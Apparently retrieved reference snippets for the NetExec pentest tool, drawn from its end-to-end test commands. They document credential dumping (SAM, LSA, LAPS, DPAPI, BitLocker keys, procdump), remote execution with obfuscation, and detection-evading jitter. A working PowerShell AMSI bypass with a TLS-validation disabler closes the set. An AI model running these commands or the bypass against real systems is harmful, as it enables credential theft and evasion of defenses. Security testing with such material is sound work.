KERBEROS -M petitpotam ``` -------------------------------- ### NetExec SMB: Add Computer Account Management Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Manages computer accounts in Active Directory via SMB. This module allows adding new computer accounts, changing their passwords, or deleting existing ones. ```APIDOC netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M add-computer -o NAME="" [PASSWORD=""] [CHANGEPW=True] [DELETE=True] - Manages computer accounts in Active Directory via SMB. - Parameters: - TARGET_HOST: The target IP address or hostname. - LOGIN_USERNAME: The username for authentication. - LOGIN_PASSWORD: The password for authentication. - KERBEROS: Use Kerberos authentication. - Options: - NAME: The name of the computer account to add, modify, or delete. - PASSWORD: The password for the new computer account. Required when adding a new account. - CHANGEPW: Boolean. If set to True, changes the password of an existing computer account. - DELETE: Boolean. If set to True, deletes the specified computer account. ``` -------------------------------- ### netexec WINRM Module Commands Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Documents various commands and options for interacting with Windows Remote Management (WinRM) services using netexec. This includes command execution, credential dumping (SAM, LSA, LAPS), and protocol/port checking functionalities. ```APIDOC netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS - Base command for WinRM operations. - Parameters: - TARGET_HOST: The target WinRM host (IP address or hostname). - LOGIN_USERNAME: Username for authentication. - LOGIN_PASSWORD: Password for authentication. - KERBEROS: Specifies Kerberos authentication. netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X - Executes a command on the target via WinRM. - : The command to execute (e.g., ipconfig). netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --sam [--dump-method ] - Dumps SAM database credentials. - --dump-method : Specifies the dump method (cmd or powershell). netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --lsa [--dump-method ] - Dumps LSA secrets. - --dump-method : Specifies the dump method (cmd or powershell). netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --laps - Retrieves LAPS passwords. netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --check-proto - Checks for WinRM protocol availability. - : One or more protocols to check (http, https). netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --port - Specifies custom WinRM ports. - : One or more ports (e.g., 5985, 5986). netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --check-proto --port - Combines protocol and port checking for specific configurations. ``` -------------------------------- ### netexec LDAP Module Commands Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Documents various commands and modules available for interacting with LDAP services using netexec. These commands allow for enumeration, information gathering, and specific attacks against LDAP targets within an Active Directory environment. ```APIDOC netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -L - Lists all available LDAP modules. netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M [-o ] - Executes a specific LDAP module. - Parameters: - TARGET_HOST: The target LDAP server (IP address or hostname). - LOGIN_USERNAME: Username for authentication. - LOGIN_PASSWORD: Password for authentication. - KERBEROS: Specifies Kerberos authentication. - -M : Specifies the module to run. Examples include: - adcs: Active Directory Certificate Services enumeration. - daclread: Read DACLs (Discretionary Access Control Lists). - get-desc-users: Get descriptive user information. - get-network: Enumerate network information. - groupmembership: Enumerate group memberships. - laps: Retrieve LAPS passwords. - maq: Machine Account Quota enumeration. - subnets: Enumerate subnets. - user-desc: Get user descriptions. - whoami: Get current user context. - pso: Password Settings Object enumeration. - -o : Module-specific options (e.g., TARGET=LOGIN_USERNAME ACTION=read for daclread). ``` -------------------------------- ### Perform WMI Queries over SMB with NetExec Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Executes a Windows Management Instrumentation (WMI) query against the target host via SMB, allowing for system information retrieval or management tasks. ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --wmi "select Name from win32_computersystem" ``` -------------------------------- ### NetExec SMB Kerberos: Procdump Module for Process Dumping Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Shows the usage of the 'procdump' module, which is designed to dump process memory or credentials from a target system. This is a common technique for post-exploitation credential harvesting. ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M procdump ``` -------------------------------- ### NetExec SMB: BitLocker Recovery Key Extraction Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Attempts to extract BitLocker recovery keys from the target system via SMB. This can be useful for gaining access to encrypted drives. ```APIDOC netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M bitlocker - Attempts to extract BitLocker recovery keys. - Parameters: - TARGET_HOST: The target IP address or hostname. - LOGIN_USERNAME: The username for authentication. - LOGIN_PASSWORD: The password for authentication. - KERBEROS: Use Kerberos authentication. ``` -------------------------------- ### Configure Jitter for NetExec SMB Operations Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Illustrates how to introduce random delays (jitter) between operations to make network traffic less predictable and potentially evade detection. Jitter can be a fixed value or a range. ```CLI netexec --jitter 2 smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS netexec --jitter 1-3 smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS netexec --jitter 2-2 smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS ``` -------------------------------- ### netexec MSSQL PowerShell Execution Commands Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Documents various options for executing PowerShell commands via MSSQL using netexec, including controls for 32-bit execution, obfuscation, AMSI bypass, and encoding preferences. It also includes a command to clear obfuscated scripts. ```APIDOC netexec mssql TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X [--force-ps32] [--obfs] [--amsi-bypass ] [--no-encode] - Executes a PowerShell command on the target via MSSQL. - Parameters: - TARGET_HOST: The target MSSQL server (IP address or hostname). - LOGIN_USERNAME: Username for authentication. - LOGIN_PASSWORD: Password for authentication. - KERBEROS: Specifies Kerberos authentication. - -X : The PowerShell command to execute (e.g., ipconfig). - --force-ps32: Forces PowerShell to run in 32-bit mode. - --obfs: Obfuscates the PowerShell command to evade detection. - --amsi-bypass : Specifies a file for AMSI (Antimalware Scan Interface) bypass. - --no-encode: Prevents encoding of the PowerShell command. netexec mssql TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --clear-obfscripts - Clears obfuscated scripts from the target (note: current usage might be limited). ``` -------------------------------- ### Clear Obfuscated Scripts with NetExec SMB Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt This command is used to clear any previously obfuscated scripts that might be lingering on the target system, ensuring a clean state for subsequent operations. ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --clear-obfscripts ``` -------------------------------- ### NetExec SMB: DPAPI Hash Extraction Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Extracts DPAPI (Data Protection API) master keys and credentials from the target system. These hashes can be used to decrypt sensitive data protected by DPAPI. ```APIDOC netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M dpapi_hash [-o OUTPUTFILE=""] - Extracts DPAPI master keys and credentials. - Parameters: - TARGET_HOST: The target IP address or hostname. - LOGIN_USERNAME: The username for authentication. - LOGIN_PASSWORD: The password for authentication. - KERBEROS: Use Kerberos authentication. - Options: - OUTPUTFILE: Optional. Specifies a file to save the extracted hashes to. ``` -------------------------------- ### PowerShell: Disable SSL Validation and AMSI Bypass Source: https://github.com/pennyw0rth/netexec/blob/main/tests/data/test_amsi_bypass.txt This PowerShell snippet disables SSL/TLS certificate validation for network connections by setting `ServerCertificateValidationCallback` to always return true. Additionally, it attempts to bypass AMSI (Antimalware Scan Interface) by manipulating the `AmsiUtils` class, specifically setting `amsiInitFailed` to true, which can prevent scripts from being scanned by antivirus solutions. This technique is commonly employed in offensive security scenarios to evade detection. ```PowerShell [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} try{ [Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true) }catch{} ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.